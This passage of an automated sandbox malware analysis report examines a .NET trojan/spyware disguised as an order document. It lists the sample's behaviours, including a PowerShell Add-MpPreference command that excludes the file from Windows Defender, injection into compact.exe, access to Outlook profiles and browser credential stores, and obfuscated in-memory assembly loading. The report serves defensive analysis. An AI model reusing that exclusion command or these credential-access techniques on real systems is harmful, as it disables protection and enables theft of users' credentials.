            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, bot8SiAUO3JBgG2e18.cs Security API names: _0020.SetAccessControl
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, bot8SiAUO3JBgG2e18.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, bot8SiAUO3JBgG2e18.cs Security API names: _0020.AddAccessRule
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, bot8SiAUO3JBgG2e18.cs Security API names: _0020.SetAccessControl
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, bot8SiAUO3JBgG2e18.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, bot8SiAUO3JBgG2e18.cs Security API names: _0020.AddAccessRule
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, DJO8vVomSf1ydRl3pV.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@10/7@15/13
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.log
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6332:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lxqwflws.i4u.ps1
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: compact.exe, 0000000A.00000002.4565290385.0000000003192000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000A.00000002.4565290385.000000000316E000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000A.00000003.2684033486.0000000003163000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000A.00000002.4565290385.0000000003163000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000A.00000003.2683868623.0000000003143000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe ReversingLabs: Detection: 23%
            Source: unknown Process created: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe"
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Process created: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe"
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe Process created: C:\Windows\SysWOW64\compact.exe "C:\Windows\SysWOW64\compact.exe"
            Source: C:\Windows\SysWOW64\compact.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dwrite.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll, windowscodecs.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, amsi.dll, msasn1.dll, userenv.dll, profapi.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll
            Source: C:\Windows\SysWOW64\compact.exe Section loaded: wininet.dll, kernel.appcore.dll, uxtheme.dll, ieframe.dll, iertutil.dll, netapi32.dll, version.dll, userenv.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, secur32.dll, mlang.dll, propsys.dll, winsqlite3.dll, vaultcli.dll, wintypes.dll, dpapi.dll, cryptbase.dll
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe Section loaded: wininet.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, fwpuclnt.dll, rasadhlp.dll
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\compact.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: compact.pdbGCTL source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000005.00000002.2506815789.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 00000009.00000003.2651430615.0000000000D7B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EUSOiCcoIEEJJ.exe, 00000009.00000002.4564033459.000000000064E000.00000002.00000001.01000000.0000000C.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4565010474.000000000064E000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 0000000A.00000003.2509176695.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 0000000A.00000003.2506580871.00000000031EC000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, compact.exe, compact.exe, 0000000A.00000003.2509176695.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 0000000A.00000003.2506580871.00000000031EC000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: CAhp.pdbSHA256 source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
            Source: Binary string: compact.pdb source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000005.00000002.2506815789.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 00000009.00000003.2651430615.0000000000D7B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CAhp.pdb source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe

            Data Obfuscation

            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, mainscreen.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.77e0000.5.raw.unpack, -Module-.cs .Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.77e0000.5.raw.unpack, PingPong.cs .Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, bot8SiAUO3JBgG2e18.cs .Net Code: s0H3RLDQ8P System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.27bc388.0.raw.unpack, -Module-.cs .Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.27bc388.0.raw.unpack, PingPong.cs .Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, bot8SiAUO3JBgG2e18.cs .Net Code: s0H3RLDQ8P System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, bot8SiAUO3JBgG2e18.cs .Net Code: s0H3RLDQ8P System.Reflection.Assembly.Load(byte[])
            Source: 10.2.compact.exe.3bfcd08.2.raw.unpack, mainscreen.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 13.0.EUSOiCcoIEEJJ.exe.298cd08.1.raw.unpack, mainscreen.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 13.2.EUSOiCcoIEEJJ.exe.298cd08.1.raw.unpack, mainscreen.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 14.2.firefox.exe.252dcd08.0.raw.unpack, mainscreen.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Static PE information: 0xB57478D9 [Mon Jun 21 01:26:49 2066 UTC]
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Static PE information: section name: .text entropy: 7.977348206861711
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, SVVM01mpZ25hLYZ4RI.csHigh entropy of concatenated method names: 'OAKNXBEl4g', 'vuaNjkVJMt', 'uVsN3Dngd8', 'LwQNxBk57H', 'sV2N4rsor3', 'sVxNbTTglq', 'e7qNtXfga4', 'FnkVEZCigg', 'EwqVsP8lgd', 'bhSVSN9of9'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, p3OJO3Xj3WA6yFT9bG2.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lXOdpIBptL', 'HcfdwSZI5m', 'JqId0hPLB2', 'AZWdHKOZDe', 'qg6dQU4ShO', 'IjndyIKn5G', 'toldEdc4kb'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, M9EhpapaLJXqtHovTI.csHigh entropy of concatenated method names: 'LB2WOC0vKd', 'gxFWLGxcOd', 'zevWpphlcS', 'AYBWwBqABy', 'H7WWFSVrqy', 'eAmWn0CPOU', 'LnWWTTlmjB', 'ngyWUjriDU', 'ksAWJPLoKR', 'xOBWiREsmc'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, LSsALD7k0xoq1ICkoe.csHigh entropy of concatenated method names: 'tOH1fTeCn3', 'PBn1K13X6j', 'un91RBxDJS', 'LWR1akLpun', 'rFr1CXR8Wv', 'xkM1esRiWY', 'dDt16xZq02', 'g7k1oLaZv3', 'QJh1ZMVTsG', 'WR91qeYbsK'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, oZDxN9X20Mgb54aR6pJ.csHigh entropy of concatenated method names: 'tHONfNL4Ct', 'VPdNKmw5Kk', 'aIMNRNoNPk', 'i1PNahuEeD', 'pJSNC6jfZk', 'O66NeUeL4m', 'QOPN6RcP64', 'cPDNoUslBd', 'QT6NZtiW5C', 'TccNqv8eCT'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, o26AjyZyl3gqQ7oXg6.csHigh entropy of concatenated method names: 'T2QuaAVOq5', 'pR0ue4OQLQ', 'XJKuoFxnNH', 'HmmuZ63kFp', 'rI9uWpu18R', 'H8Xuv42bSQ', 'tdJu8pYTZN', 'KAMuVCo5qt', 'lAguNwjToc', 'DtuudfXIOt'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, GL6gb9sBp7fYqEvq2Q.csHigh entropy of concatenated method names: 'KkiVxEvJ3F', 'KpiV4Uv6ke', 'ioBVuG2auq', 'HXlVb33PMn', 'NUsVtT8Ega', 'kk5V1N03Zj', 'JekVA2et5Q', 'dQbVlFGkfH', 'GfUVBXHQhc', 'yEiVYRgcUO'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, fEPxOLqyxV0ISeYYpd.csHigh entropy of concatenated method names: 'hEmbCiojYN', 'MDib6DjB6I', 'LsLunYOHtF', 'kwOuTHb6Q3', 'qN4uUXAaGk', 'QRhuJKagdx', 'NehuiMuG7Q', 'HL1u5I7oSS', 'kFHu7k0mIY', 'LcCuORBMxF'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, l7GCTdzeZ7vklkKi9T.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OlgNPlIuCu', 't46NW6QBH7', 'vdoNvjFq0f', 'MpXN8jHfsl', 'UuyNV7sA5q', 'IflNNWJBJ9', 'GjhNdnLcpt'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, OkXB9a4YdprsSPYtim.csHigh entropy of concatenated method names: 'Dispose', 'EfLXSVg0H3', 'onWMFgk4Ec', 'QkmDDs21Rd', 'DFLXm6gb9B', 'Q7fXzYqEvq', 'ProcessDialogKey', 'aQLM2DcgpX', 'd1qMXbu54T', 'MXKMM0VVM0'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, FbfCiLHAwcB6jTs026.csHigh entropy of concatenated method names: 'as98BaWaTv', 'KON8YHwojI', 'ToString', 'm2t8xEFsiv', 'Wbs84Crufv', 'uDp8uUTOVE', 'RHg8bgWgAn', 'B7H8tcs2CY', 'KXa81xJi35', 'hAO8AvuiCx'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, DJO8vVomSf1ydRl3pV.csHigh entropy of concatenated method names: 'aGQ4ptwqlf', 'IkP4wkfKQ8', 'LV94045f6s', 'fyG4HDDR3A', 'wKC4QAIlY7', 'l7T4ykrtZZ', 'UT94EqrpnM', 'Xna4sQWMqK', 'X9J4SMTsoi', 'fdI4mJwYou'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, M0wsTL3r3fuRc7Boqc.csHigh entropy of concatenated method names: 'G0oX1JO8vV', 'YSfXA1ydRl', 'VylXB3gqQ7', 'DXgXY6xEPx', 'BYYXWpd7ZT', 'wqVXvXjyta', 'kT6eTBkgJY8hnJDWSd', 'lxfcYtl8hpGGBG5Bj4', 'PmkXXICqVk', 'wgWXj1qyEr'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, h36j66y444CnFBKR7G.csHigh entropy of concatenated method names: 'oNj8sJ81sV', 'TbP8mlgZci', 'i9UV2eRNf2', 'IyEVXLqT2h', 'EeM8GEtoKN', 'TXo8LsTAkW', 'GID8cVTijI', 'y1a8pM5Fl8', 'BBp8wpi7ng', 'j9o80OACFU'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, Eir6qOiBX37WHUEZgT.csHigh entropy of concatenated method names: 'v701xBBigl', 'Vlm1uK1yZf', 'qMg1tonidj', 'xREtm0iFqq', 't17tzxmeZL', 'txF12hMAkJ', 'WWR1XhoCxg', 'fD81MZtP3J', 'KSB1jgBs5p', 'WE613Q4a53'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, ETASaYckrPsNWXkt9U.csHigh entropy of concatenated method names: 'DBXPoVKmtb', 'OQcPZ45K2A', 'MTXP9NOdhu', 'tYrPF3M51q', 'EdhPTVGOq6', 'kSRPUf0D1p', 'wwaPiZYVrI', 'fiBP5xpaSK', 'YXNPOPInqM', 'Vf8PG9jj2j'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, RS0m6OMYkClxmqgBal.csHigh entropy of concatenated method names: 'WFjRnK8Nm', 'JLka2QnLx', 'kVvegj2dT', 'Vkw6Y0ejb', 'He7ZhKfmT', 'McpqvK0Qm', 'NNNLol5KQfoNwUW6RT', 'Lm2mVms7BvVDON4nSa', 'rOKVYwLJm', 'LQOdUvJaM'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, lQOi7u0sTIIXy3UBMv.csHigh entropy of concatenated method names: 'ToString', 'cRCvGAvqRL', 'Ym5vF9OdRw', 'PFovniqlPa', 'BQ7vTQCW17', 'p6tvU4cClr', 'oInvJ0RFHM', 'WckviX0Mgf', 'QWfv55NKx8', 'fKmv7WMMRE'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, MZTkqV9XjytaaqfcxB.csHigh entropy of concatenated method names: 'O2MtrL7ZZd', 'CYnt47dn0U', 'lUhtbEiK3M', 'a5dt1GQ4Zc', 'A3QtAMHkQp', 'spWbQ7B0GQ', 'zLKbyaDNfg', 'sWLbEAmQ6q', 'nBnbsQu2XG', 'XSfbSajvqw'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, bot8SiAUO3JBgG2e18.csHigh entropy of concatenated method names: 'bHwjrmVBLQ', 'YKEjxRTn89', 'Q2pj4t6JtQ', 'wAtjut5hdM', 'l0ijbPKrdR', 'Rfgjt3l582', 'Qrcj1xlk4Z', 'fyWjAR5QsU', 'uGyjlVjo3B', 'cqfjBvDQxH'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, PDcgpXSj1qbu54T7XK.csHigh entropy of concatenated method names: 'oMhV9RTvBK', 'VkyVFWQYJ1', 'rslVnd6KKr', 'uKTVTIKgk9', 'bdpVpDVw7v', 'joPVUIKhDc', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, SVVM01mpZ25hLYZ4RI.csHigh entropy of concatenated method names: 'OAKNXBEl4g', 'vuaNjkVJMt', 'uVsN3Dngd8', 'LwQNxBk57H', 'sV2N4rsor3', 'sVxNbTTglq', 'e7qNtXfga4', 'FnkVEZCigg', 'EwqVsP8lgd', 'bhSVSN9of9'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, p3OJO3Xj3WA6yFT9bG2.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lXOdpIBptL', 'HcfdwSZI5m', 'JqId0hPLB2', 'AZWdHKOZDe', 'qg6dQU4ShO', 'IjndyIKn5G', 'toldEdc4kb'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, M9EhpapaLJXqtHovTI.csHigh entropy of concatenated method names: 'LB2WOC0vKd', 'gxFWLGxcOd', 'zevWpphlcS', 'AYBWwBqABy', 'H7WWFSVrqy', 'eAmWn0CPOU', 'LnWWTTlmjB', 'ngyWUjriDU', 'ksAWJPLoKR', 'xOBWiREsmc'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, LSsALD7k0xoq1ICkoe.csHigh entropy of concatenated method names: 'tOH1fTeCn3', 'PBn1K13X6j', 'un91RBxDJS', 'LWR1akLpun', 'rFr1CXR8Wv', 'xkM1esRiWY', 'dDt16xZq02', 'g7k1oLaZv3', 'QJh1ZMVTsG', 'WR91qeYbsK'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, oZDxN9X20Mgb54aR6pJ.csHigh entropy of concatenated method names: 'tHONfNL4Ct', 'VPdNKmw5Kk', 'aIMNRNoNPk', 'i1PNahuEeD', 'pJSNC6jfZk', 'O66NeUeL4m', 'QOPN6RcP64', 'cPDNoUslBd', 'QT6NZtiW5C', 'TccNqv8eCT'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, o26AjyZyl3gqQ7oXg6.csHigh entropy of concatenated method names: 'T2QuaAVOq5', 'pR0ue4OQLQ', 'XJKuoFxnNH', 'HmmuZ63kFp', 'rI9uWpu18R', 'H8Xuv42bSQ', 'tdJu8pYTZN', 'KAMuVCo5qt', 'lAguNwjToc', 'DtuudfXIOt'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, GL6gb9sBp7fYqEvq2Q.csHigh entropy of concatenated method names: 'KkiVxEvJ3F', 'KpiV4Uv6ke', 'ioBVuG2auq', 'HXlVb33PMn', 'NUsVtT8Ega', 'kk5V1N03Zj', 'JekVA2et5Q', 'dQbVlFGkfH', 'GfUVBXHQhc', 'yEiVYRgcUO'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, fEPxOLqyxV0ISeYYpd.csHigh entropy of concatenated method names: 'hEmbCiojYN', 'MDib6DjB6I', 'LsLunYOHtF', 'kwOuTHb6Q3', 'qN4uUXAaGk', 'QRhuJKagdx', 'NehuiMuG7Q', 'HL1u5I7oSS', 'kFHu7k0mIY', 'LcCuORBMxF'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, l7GCTdzeZ7vklkKi9T.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OlgNPlIuCu', 't46NW6QBH7', 'vdoNvjFq0f', 'MpXN8jHfsl', 'UuyNV7sA5q', 'IflNNWJBJ9', 'GjhNdnLcpt'
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
            File created: \art_spec. 4008670601 aztek order _ 7.3.2024.exe

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
            Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\compact.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Windows\SysWOW64\compact.exe API/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\compact.exe API/Special instruction interceptor: Address: 7FFDB442D7E4
            Source: C:\Windows\SysWOW64\compact.exe API/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\compact.exe API/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\compact.exe API/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\compact.exe API/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\compact.exe API/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\compact.exe API/Special instruction interceptor: Address: 7FFDB442DA44
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Memory allocated: A70000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Memory allocated: 2790000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Memory allocated: 4790000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Memory allocated: 7A40000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Memory allocated: 8A40000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Memory allocated: 8C00000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Memory allocated: 9C00000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Memory allocated: 9F90000 memory reserve | memory write watch
